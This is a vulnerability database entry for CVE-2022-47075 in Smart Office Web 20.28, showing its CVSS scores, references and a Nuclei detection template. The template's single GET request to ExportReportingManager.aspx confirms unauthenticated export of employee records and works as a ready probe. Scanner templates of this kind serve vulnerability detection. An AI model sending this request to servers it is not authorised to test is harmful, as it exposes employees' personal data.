Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nucleiProjectDiscoveryNUCLEI:CVE-2022-47075
HistoryOct 17, 2023 - 7:20 a.m.

Smart Office Web 20.28 - Information Disclosure

2023-10-1707:20:28
ProjectDiscovery
github.com
3
cve-2022-47075
information disclosure
smart office
smartofficepayroll
packetstorm
exposure

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.014 Low

EPSS

Percentile

86.5%

JSON
An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.

id: CVE-2022-47075

info:
  name: Smart Office Web 20.28 - Information Disclosure
  author: r3Y3r53
  severity: high
  description: |
    An issue was discovered in Smart Office Web 20.28 and earlier allows attackers to download sensitive information via the action name parameter to ExportEmployeeDetails.aspx, and to ExportReportingManager.aspx.
  reference:
    - https://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-47075
    - http://packetstormsecurity.com/files/173093/Smart-Office-Web-20.28-Information-Disclosure-Insecure-Direct-Object-Reference.html
    - https://cvewalkthrough.com/smart-office-suite-unauthenticated-data-ex/
    - https://youtu.be/D42upepxzwM
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-47075
    epss-score: 0.014
    epss-percentile: 0.86401
    cpe: cpe:2.3:a:smartofficepayroll:smartoffice:*:*:*:*:web:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: smartofficepayroll
    product: smartoffice
  tags: cve,cve2022,packetstorm,smart-office,info,exposure,smartofficepayroll

http:
  - method: GET
    path:
      - "{{BaseURL}}/ExportReportingManager.aspx"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/CSV")'
          - 'contains(body, "EmployeeName") && contains(body, "EmployeeCode")'
        condition: and
# digest: 4a0a00473045022038dc62b16bdae6d87b4226c574c3dcbc8829caf844c27d940adc6af39a52e4ac02210086ad3e6ad5d37a37b6310032f2db54f28b83ca7de6a55d8feb9cd2ba89c9d705:922c64590222798bb761d5b6d8e72950

Related

nvd 1
prion 1
cve 1
cvelist 1
zdt 1
packetstorm 1
exploitdb 1
nvd
nvd
CVE-2022-47075
2023-02-28 23:15:11
prion
prion
Design/Logic Flaw
2023-02-28 23:15:00
cve
cve
CVE-2022-47075
2023-02-28 23:15:11
cvelist
cvelist
CVE-2022-47075
2023-02-28 00:00:00
zdt
zdt
Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated) Exploit
2023-06-26 00:00:00
packetstorm
packetstorm
Smart Office Web 20.28 Information Disclosure / Insecure Direct Object Reference
2023-06-23 00:00:00
exploitdb
exploitdb
Smart Office Web 20.28 - Remote Information Disclosure (Unauthenticated)
2023-06-22 00:00:00

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

0.014 Low

EPSS

Percentile

86.5%

JSON
Related for NUCLEI:CVE-2022-47075
nvd1prion1cve1cvelist1zdt1packetstorm1exploitdb1